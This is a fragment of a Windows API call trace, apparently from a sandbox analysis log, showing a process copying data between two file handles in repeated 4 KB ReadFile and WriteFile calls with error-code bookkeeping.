[0101.246] SetLastError (dwErrCode=0x0) [0101.246] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.246] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.246] GetLastError () returned 0x0 [0101.246] SetLastError (dwErrCode=0x0) [0101.246] GetLastError () returned 0x0 [0101.246] SetLastError (dwErrCode=0x0) [0101.246] GetLastError () returned 0x0 [0101.246] SetLastError (dwErrCode=0x0) [0101.246] GetLastError () returned 0x0 [0101.246] SetLastError (dwErrCode=0x0) [0101.246] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.246] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.246] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.247] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] GetLastError () returned 0x0 [0101.247] SetLastError (dwErrCode=0x0) [0101.247] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.247] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.248] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.248] GetLastError () returned 0x0 [0101.248] SetLastError (dwErrCode=0x0) [0101.249] GetLastError () returned 0x0 [0101.249] SetLastError (dwErrCode=0x0) [0101.249] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.249] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.249] GetLastError () returned 0x0 [0101.249] SetLastError (dwErrCode=0x0) [0101.249] GetLastError () returned 0x0 [0101.249] SetLastError (dwErrCode=0x0) [0101.249] GetLastError () returned 0x0 [0101.249] SetLastError (dwErrCode=0x0) [0101.249] GetLastError () returned 0x0 [0101.249] SetLastError (dwErrCode=0x0) [0101.249] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.249] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.249] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.250] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] GetLastError () returned 0x0 [0101.250] SetLastError (dwErrCode=0x0) [0101.250] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.250] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.251] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.251] GetLastError () returned 0x0 [0101.251] SetLastError (dwErrCode=0x0) [0101.252] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.252] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.252] GetLastError () returned 0x0 [0101.252] SetLastError (dwErrCode=0x0) [0101.252] GetLastError () returned 0x0 [0101.252] SetLastError (dwErrCode=0x0) [0101.252] GetLastError () returned 0x0 [0101.252] SetLastError (dwErrCode=0x0) [0101.252] GetLastError () returned 0x0 [0101.252] SetLastError (dwErrCode=0x0) [0101.252] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.253] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.253] GetLastError () returned 0x0 [0101.253] SetLastError (dwErrCode=0x0) [0101.253] GetLastError () returned 0x0 [0101.253] SetLastError (dwErrCode=0x0) [0101.253] GetLastError () returned 0x0 [0101.253] SetLastError (dwErrCode=0x0) [0101.253] GetLastError () returned 0x0 [0101.253] SetLastError (dwErrCode=0x0) [0101.254] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.254] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.254] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.254] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.254] GetLastError () returned 0x0 [0101.254] SetLastError (dwErrCode=0x0) [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.255] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] GetLastError () returned 0x0 [0101.255] SetLastError (dwErrCode=0x0) [0101.255] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.255] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.256] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] GetLastError () returned 0x0 [0101.256] SetLastError (dwErrCode=0x0) [0101.256] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.257] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.257] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] GetLastError () returned 0x0 [0101.257] SetLastError (dwErrCode=0x0) [0101.257] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.257] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.258] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] GetLastError () returned 0x0 [0101.258] SetLastError (dwErrCode=0x0) [0101.258] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.258] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.259] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.259] GetLastError () returned 0x0 [0101.259] SetLastError (dwErrCode=0x0) [0101.260] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.260] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.260] GetLastError () returned 0x0 [0101.260] SetLastError (dwErrCode=0x0) [0101.260] GetLastError () returned 0x0 [0101.260] SetLastError (dwErrCode=0x0) [0101.260] GetLastError () returned 0x0 [0101.260] SetLastError (dwErrCode=0x0) [0101.260] GetLastError () returned 0x0 [0101.260] SetLastError (dwErrCode=0x0) [0101.260] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.260] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.260] GetLastError () returned 0x0 [0101.260] SetLastError (dwErrCode=0x0) [0101.260] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.261] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] GetLastError () returned 0x0 [0101.261] SetLastError (dwErrCode=0x0) [0101.261] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.411] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.411] GetLastError () returned 0x0 [0101.411] SetLastError (dwErrCode=0x0) [0101.411] GetLastError () returned 0x0 [0101.411] SetLastError (dwErrCode=0x0) [0101.411] GetLastError () returned 0x0 [0101.411] SetLastError (dwErrCode=0x0) [0101.411] GetLastError () returned 0x0 [0101.411] SetLastError (dwErrCode=0x0) [0101.411] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.412] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.412] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.412] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.412] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.412] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.412] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.412] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.412] GetLastError () returned 0x0 [0101.412] SetLastError (dwErrCode=0x0) [0101.412] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.413] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] GetLastError () returned 0x0 [0101.413] SetLastError (dwErrCode=0x0) [0101.413] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.413] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.414] GetLastError () returned 0x0 [0101.414] SetLastError (dwErrCode=0x0) [0101.414] GetLastError () returned 0x0 [0101.414] SetLastError (dwErrCode=0x0) [0101.414] GetLastError () returned 0x0 [0101.414] SetLastError (dwErrCode=0x0) [0101.414] GetLastError () returned 0x0 [0101.414] SetLastError (dwErrCode=0x0) [0101.414] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.414] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.415] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.415] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.415] GetLastError () returned 0x0 [0101.415] SetLastError (dwErrCode=0x0) [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] GetLastError () returned 0x0 [0101.416] SetLastError (dwErrCode=0x0) [0101.416] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 